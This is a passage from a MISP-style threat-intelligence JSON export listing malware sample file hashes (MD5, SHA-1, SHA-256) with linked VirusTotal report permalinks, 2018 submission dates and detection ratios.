"6836f38c-a2eb-4f7c-9055-2ffb96e7c45e", "relationship_type": "analysed-with", "timestamp": "1537334494", "uuid": "5ba1dcde-a0e8-4072-ba50-44f202de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334462", "to_ids": true, "type": "md5", "uuid": "8de70b34-70b1-43f2-b3f7-fed0a57ab773", "value": "1de7ceb3434243aa94296393165f89e7" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334462", "to_ids": true, "type": "sha1", "uuid": "5db4126d-0436-41b2-96a9-525e9924f1db", "value": "67a12afbe6751418141284716235a6b27c17443a" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334462", "to_ids": true, "type": "sha256", "uuid": "a64377f4-b5b5-4ecf-b760-4970341efe1a", "value": "725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334463", "uuid": "6836f38c-a2eb-4f7c-9055-2ffb96e7c45e", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334463", "to_ids": false, "type": "datetime", "uuid": "a7862599-832b-4ba2-ab1c-b1a320c1a4ad", "value": "2018-09-19T03:31:22" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334463", "to_ids": false, "type": "link", "uuid": "abcf84f8-0717-443f-b190-4c623df3933d", "value": "https://www.virustotal.com/file/725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054/analysis/1537327882/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334464", "to_ids": false, "type": "text", "uuid": "c306e374-13a0-4f9e-956c-e55fe50a8c97", "value": "26/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334467", "uuid": "edd4b990-82be-4e5e-858f-50bbd7222f03", "ObjectReference": [ { "comment": "", "object_uuid": "edd4b990-82be-4e5e-858f-50bbd7222f03", "referenced_uuid": "54646fe4-9b9d-470a-9042-d446a90a15a5", "relationship_type": "analysed-with", "timestamp": "1537334494", "uuid": "5ba1dcde-f6d4-4fea-9dcb-421402de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334464", "to_ids": true, "type": "md5", "uuid": "0de582fd-db8e-43c5-abb2-93b0214dcc6f", "value": "f8c7e23c71478aa99dc3627da989b2ca" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334464", "to_ids": true, "type": "sha1", "uuid": "f017cfec-9858-4d88-b9e0-ff9a6383f57e", "value": "e41d26b124c21b2c82b77194ed6be6ee8281410a" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334465", "to_ids": true, "type": "sha256", "uuid": "bbb8d985-2be4-4fa1-8524-8acb92ab0616", "value": "dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334465", "uuid": "54646fe4-9b9d-470a-9042-d446a90a15a5", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334465", "to_ids": false, "type": "datetime", "uuid": "f8ac3222-2b8a-49c6-b107-f22538e9f3f9", "value": "2018-09-18T20:07:10" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334466", "to_ids": false, "type": "link", "uuid": "193bbd5f-b6bd-43bc-b1f7-f75586c795ad", "value": "https://www.virustotal.com/file/dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54/analysis/1537301230/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334466", "to_ids": false, "type": "text", "uuid": "2240f3fb-744f-48a4-8918-f9c428c4d465", "value": "10/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334469", "uuid": "33e723b8-2142-46a4-8eae-c311211ea8a0", "ObjectReference": [ { "comment": "", "object_uuid": "33e723b8-2142-46a4-8eae-c311211ea8a0", "referenced_uuid": "87558dd2-f70c-49b7-b710-6666909e0e91", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-6b5c-447b-b617-489c02de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334466", "to_ids": true, "type": "md5", "uuid": "df8f7068-ffca-4885-bac9-8c007b52827d", "value": "9d080aa27da74e146a45b56c86476f20" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334467", "to_ids": true, "type": "sha1", "uuid": "ca26330b-73f7-4055-9840-8c65b17290d3", "value": "115bda02fd2807bd0e9645656c378bf1b145b4b8" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334467", "to_ids": true, "type": "sha256", "uuid": "47a1b89f-0b1b-486d-8121-6e17019f64de", "value": "dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334468", "uuid": "87558dd2-f70c-49b7-b710-6666909e0e91", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334468", "to_ids": false, "type": "datetime", "uuid": "3d949d3f-cbed-49eb-b6d4-76efa21d3605", "value": "2018-09-18T11:41:09" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334468", "to_ids": false, "type": "link", "uuid": "120a5e8e-d241-45d1-a52a-b20a69c69c21", "value": "https://www.virustotal.com/file/dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff/analysis/1537270869/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334469", "to_ids": false, "type": "text", "uuid": "6522271c-6206-43b8-bed9-2ee6b928da31", "value": "21/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334472", "uuid": "d88b602b-394b-4c46-92fd-b776ed9ef8d9", "ObjectReference": [ { "comment": "", "object_uuid": "d88b602b-394b-4c46-92fd-b776ed9ef8d9", "referenced_uuid": "3df3df12-3458-48cc-9031-686fefeaf564", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-8064-4ae5-912f-446a02de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334469", "to_ids": true, "type": "md5", "uuid": "de4b1ff0-8efa-46f4-b618-be604c2eeedc", "value": "2d39b1792b263eba084e10c54e053d84" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334469", "to_ids": true, "type": "sha1", "uuid": "83e0e2db-e2ee-46f6-bb21-a2494c055af2", "value": "1468eac59bd43901de82389276bded18202f799f" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334469", "to_ids": true, "type": "sha256", "uuid": "73f9847b-1485-4c7d-ad01-12b9003b1e97", "value": "f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334470", "uuid": "3df3df12-3458-48cc-9031-686fefeaf564", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334470", "to_ids": false, "type": "datetime", "uuid": "9c2f0268-084d-401f-a118-859baa7da926", "value": "2018-09-18T18:34:30" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334470", "to_ids": false, "type": "link", "uuid": "92b34d76-149f-4fab-a1c0-3d1fab052d39", "value": "https://www.virustotal.com/file/f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc/analysis/1537295670/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334471", "to_ids": false, "type": "text", "uuid": "7c1e81fd-a762-4c8c-910f-e10d7da374bd", "value": "15/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334474", "uuid": "93747f03-1eec-47e4-82bc-29b8356a4961", "ObjectReference": [ { "comment": "", "object_uuid": "93747f03-1eec-47e4-82bc-29b8356a4961", "referenced_uuid": "59d3e161-919f-486a-bb7b-f4010360c91c", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-2b20-43ad-bd13-4bfb02de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334471", "to_ids": true, "type": "md5", "uuid": "1fc95f86-1389-4c09-b65f-fca093d04a4e", "value": "7b5008d312465307905d96b4b8366326" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334471", "to_ids": true, "type": "sha1", "uuid": "e26b042f-7e21-411e-b30e-7412ae4f3f6d", "value": "a0a5d9fc4ce11f9069a64229cef52ba707027546" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334472", "to_ids": true, "type": "sha256", "uuid": "7531c1a3-4476-4afe-b6b0-3de9bad07f28", "value": "0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334472", "uuid": "59d3e161-919f-486a-bb7b-f4010360c91c", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334472", "to_ids": false, "type": "datetime", "uuid": "344f34ab-206c-4ca6-857f-f038049eeca8", "value": "2018-09-19T05:11:59" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334473", "to_ids": false, "type": "link", "uuid": "b42f45b5-2c58-4b38-a615-c6c66fd48dcb", "value": "https://www.virustotal.com/file/0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641/analysis/1537333919/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334473", "to_ids": false, "type": "text", "uuid": "647a2027-5c6b-4ee2-a934-fe17edc10ae7", "value": "10/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334476", "uuid": "a1f90b96-d2ce-46d4-a059-5efedbb57e07", "ObjectReference": [ { "comment": "", "object_uuid": "a1f90b96-d2ce-46d4-a059-5efedbb57e07", "referenced_uuid": "7b042050-b92e-404c-87e8-107c8986e1d7", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-1b58-4bee-bdfe-4cb202de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334473", "to_ids": true, "type": "md5", "uuid": "003bead2-ae33-4055-955d-7b48b37dda5a", "value": "e158c98a90cc7b14d026443cbcd8b520" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334474", "to_ids": true, "type": "sha1", "uuid": "2002d015-fc25-4712-a460-31be8ac249d5", "value": "0c00df2bee83f9f7c6f2be3d9dd7557e9410a579" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334474", "to_ids": true, "type": "sha256", "uuid": "b8ea3d0d-7f07-477d-91f4-0841aa2c5415", "value": "a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334475", "uuid": "7b042050-b92e-404c-87e8-107c8986e1d7", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334475", "to_ids": false, "type": "datetime", "uuid": "3eecf2ce-db49-433d-8296-a664cf52841e", "value": "2018-09-18T18:31:13" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334475", "to_ids": false, "type": "link", "uuid": "5e7593ee-fbb7-411a-8578-ed90875953e3", "value": "https://www.virustotal.com/file/a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af/analysis/1537295473/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334476", "to_ids": false, "type": "text", "uuid": "585e2605-9a59-4405-b604-1d36a87903e8", "value": "14/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334479", "uuid": "45a9a837-c3c8-436c-a546-30547955ba2c", "ObjectReference": [ { "comment": "", "object_uuid": "45a9a837-c3c8-436c-a546-30547955ba2c", "referenced_uuid": "6beca7d0-c2fe-4742-b58a-014a7f542862", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-8ef4-4e0d-9331-48aa02de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334476", "to_ids": true, "type": "md5", "uuid": "09127372-1658-4d8d-8929-4204b7bf853e", "value": "3b5baecd61190e12a526c51d5ecccbbe" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334476", "to_ids": true, "type": "sha1", "uuid": "7968de2f-7e78-42eb-b3c9-9ab750d78126", "value": "422288eb6941cee899c1046ccfcd94681b36230a" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334476", "to_ids": true, "type": "sha256", "uuid": "3c277d27-491b-4a6c-84ce-047679ff94c6", "value": "f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334477", "uuid": "6beca7d0-c2fe-4742-b58a-014a7f542862", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334477", "to_ids": false, "type": "datetime", "uuid": "f817657f-fa64-46b2-83d0-5baddd55e755", "value": "2018-09-19T03:31:11" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334477", "to_ids": false, "type": "link", "uuid": "8e6ad2e0-623d-4a80-a8d1-9fd46979f486", "value": "https://www.virustotal.com/file/f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8/analysis/1537327871/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334478", "to_ids": false, "type": "text", "uuid": "1605e2ae-c2cb-4ec7-83b8-eae5be80768c", "value": "10/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334481", "uuid": "d3df327a-fc5e-422f-a7a1-56849a91787a", "ObjectReference": [ { "comment": "", "object_uuid": "d3df327a-fc5e-422f-a7a1-56849a91787a", "referenced_uuid": "84cc3152-b806-4ef9-a3c4-e96e0b39f86d", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-7b44-4e87-838e-45f102de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334478", "to_ids": true, "type": "md5", "uuid": "0b9ba36b-0d3d-4642-adb9-ba2f8b1c850d", "value": "50ab7c696ca74e8ae322855d445e0613" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334478", "to_ids": true, "type": "sha1", "uuid": "b95ecbe5-d8f1-41ae-bad5-7fd612043512", "value": "b8b0226fb4f945b68d222c62ebb02f00874f379c" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334479", "to_ids": true, "type": "sha256", "uuid": "f10461c6-66bc-4d98-b53c-3d14d707e994", "value": "de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334479", "uuid": "84cc3152-b806-4ef9-a3c4-e96e0b39f86d", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334479", "to_ids": false, "type": "datetime", "uuid": "9229de7c-a78d-4c5e-9a03-a80669988b10", "value": "2018-09-18T10:58:17" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334480", "to_ids": false, "type": "link", "uuid": "69b5bea2-6731-4815-a928-fee550c759e4", "value": "https://www.virustotal.com/file/de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d/analysis/1537268297/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334480", "to_ids": false, "type": "text", "uuid": "e36c477b-83aa-479a-ab23-212692965f2e", "value": "20/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334483", "uuid": "14197298-00cc-4d59-85a6-5cf1be917b5c", "ObjectReference": [ { "comment": "", "object_uuid": "14197298-00cc-4d59-85a6-5cf1be917b5c", "referenced_uuid": "e3c55821-3317-4be2-8eef-60d480f1737e", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-3544-4163-a91e-414702de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334480", "to_ids": true, "type": "md5", "uuid": "0d280e5b-9777-458c-8363-5c361771d178", "value": "56303f9c9b3ec89f4a883a4d7b079f65" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334481", "to_ids": true, "type": "sha1", "uuid": "4eb9bc65-7f44-474f-8e85-9c5b3482384b", "value": "4f0d4dc8cf49e2deff34e00e362bbc81dbef1f8d" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334481", "to_ids": true, "type": "sha256", "uuid": "2f3fdf32-d834-4fbc-a166-a671350aa962", "value": "7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334482", "uuid": "e3c55821-3317-4be2-8eef-60d480f1737e", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334482", "to_ids": false, "type": "datetime", "uuid": "e412a478-b0ac-46aa-af48-a19eb9484d6e", "value": "2018-09-19T05:10:00" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334482", "to_ids": false, "type": "link", "uuid": "7149939a-1c5a-4b67-8ae0-edd23d9c4473", "value": "https://www.virustotal.com/file/7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa/analysis/1537333800/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334482", "to_ids": false, "type": "text", "uuid": "c5156a8e-63da-4dca-af17-fe34c7991169", "value": "12/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334485", "uuid": "03ebd023-1b57-415f-8a97-f37f6b1095ba", "ObjectReference": [ { "comment": "", "object_uuid": "03ebd023-1b57-415f-8a97-f37f6b1095ba", "referenced_uuid": "8755454f-61de-4423-a149-1d7ba841b7c3", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-1844-4820-8a9e-4eba02de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334483", "to_ids": true, "type": "md5", "uuid": "21b1e49a-ae72-4d64-8ba4-4cea48439229", "value": "55142f1d393c5ba7405239f232a6c059" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334483", "to_ids": true, "type": "sha1", "uuid": "2b7367c9-9efe-4928-af5a-f472cb3dfea7", "value": "effa37b97174802f17f3c75f25928226b7cd80ba" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334483", "to_ids": true, "type": "sha256", "uuid": "b186fbaa-5433-4853-a899-22e268e6c9ea", "value": "e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334484", "uuid": "8755454f-61de-4423-a149-1d7ba841b7c3", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334484", "to_ids": false, "type": "datetime", "uuid": "d289e539-f5be-4002-9ae9-d3bf3a0c4b6c", "value": "2018-09-18T18:37:52" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334484", "to_ids": false, "type": "link", "uuid": "9f4ff50c-787c-4ffe-bde1-c802d2f1a658", "value": "https://www.virustotal.com/file/e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c/analysis/1537295872/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334485", "to_ids": false, "type": "text", "uuid": "433d9d46-b96e-4c76-9134-de36185263bb", "value": "11/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334488", "uuid": "0fea2aef-bf8b-40d9-a152-3ef21cef0096", "ObjectReference": [ { "comment": "", "object_uuid": "0fea2aef-bf8b-40d9-a152-3ef21cef0096", "referenced_uuid": "c6512ad6-0d9d-4082-abcc-a5fa2c6ed93a", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-5630-47c2-92cc-4bec02de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334485", "to_ids": true, "type": "md5", "uuid": "281548ff-e16e-48e9-8871-7c4223471f70", "value": "601080e36cd6a757684e0996afd9a0e6" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334485", "to_ids": true, "type": "sha1", "uuid": "5fa5ddcc-2902-43d2-8af3-6cf2e29c219f", "value": "e818a9a229d93e6bfe0285c8a155dcaceb03b03d" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334486", "to_ids": true, "type": "sha256", "uuid": "efddf544-121e-4c33-b6c7-1e43bf310896", "value": "d7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334486", "uuid": "c6512ad6-0d9d-4082-abcc-a5fa2c6ed93a", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334486", "to_ids": false, "type": "datetime", "uuid": "f49f7c54-6abf-441e-af78-252779b3999b", "value": "2018-09-19T03:31:25" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334487", "to_ids": false, "type": "link", "uuid": "4fdb1fd9-d5e9-4521-818f-912d41c677bd", "value": "https://www.virustotal.com/file/d7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6/analysis/1537327885/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "detection-ratio", "timestamp": "1537334487", "to_ids": false, "type": "text", "uuid": "e8a2ade3-e01e-4b65-ad3c-87d11345213f", "value": "2/58" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "11", "timestamp": "1537334490", "uuid": "faeff86b-7e43-4c04-b688-b6be1f62faaa", "ObjectReference": [ { "comment": "", "object_uuid": "faeff86b-7e43-4c04-b688-b6be1f62faaa", "referenced_uuid": "ebb05fd0-b56c-4384-bde9-b8e540af4c63", "relationship_type": "analysed-with", "timestamp": "1537334495", "uuid": "5ba1dcdf-40fc-42d1-ac20-48e802de0b81" } ], "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "md5", "timestamp": "1537334487", "to_ids": true, "type": "md5", "uuid": "891b54a8-ad73-46fc-a21e-cf1f39eae44b", "value": "3a3ae909caee915af927c29a6025d16c" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha1", "timestamp": "1537334488", "to_ids": true, "type": "sha1", "uuid": "68492a5d-8e23-45f7-8beb-f2f7993c0be9", "value": "81e7207f502229769d2d7979f88235261053c24b" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1537334488", "to_ids": true, "type": "sha256", "uuid": "19113d7d-f40f-45b2-aa8d-5acb77a6d38a", "value": "31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78" } ] }, { "comment": "", "deleted": false, "description": "VirusTotal report", "meta-category": "misc", "name": "virustotal-report", "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4", "template_version": "2", "timestamp": "1537334489", "uuid": "ebb05fd0-b56c-4384-bde9-b8e540af4c63", "Attribute": [ { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "last-submission", "timestamp": "1537334489", "to_ids": false, "type": "datetime", "uuid": "9707f2d5-8180-48c6-80e2-025cf0854494", "value": "2018-09-19T03:31:19" }, { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "permalink", "timestamp": "1537334489", "to_ids": false, "type": "link", "uuid": 